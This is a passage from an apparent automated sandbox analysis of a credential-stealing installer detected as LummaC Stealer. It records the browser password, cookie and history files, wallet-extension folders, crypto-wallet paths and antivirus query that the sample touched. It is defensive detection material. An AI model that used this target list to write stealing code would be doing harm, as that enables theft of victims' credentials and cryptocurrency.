          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2dd37f98 VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeCode function: 37_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,37_2_00491486
          Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: setup.exe, 00000000.00000003.1948459100.000000000098E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005844284.0000000000986000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1970399938.000000000098B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
          Source: setup.exe, 00000000.00000003.1930721664.000000000098E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1930295451.0000000003670000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1930354486.0000000000905000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1930354486.0000000000942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: find.exe, 0000001C.00000002.2514157581.000002962877B000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000001C.00000002.2513784792.00000296286E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
          Source: C:\Users\user\Desktop\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7252, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: setup.exe, 00000000.00000002.2086918347.0000000000941000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
          Source: setup.exe, 00000000.00000002.2086918347.0000000000941000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
          Source: setup.exe, 00000000.00000002.2086918347.0000000000941000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: setup.exe, 00000000.00000003.1900295071.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
          Source: setup.exe, 00000000.00000003.1900295071.000000000093B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
          Source: setup.exe, 00000000.00000003.1900295071.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
          Source: setup.exe, 00000000.00000002.2086918347.0000000000941000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
          Source: setup.exe, 00000000.00000003.1900295071.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: setup.exe, 00000000.00000003.1900197149.000000000096A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
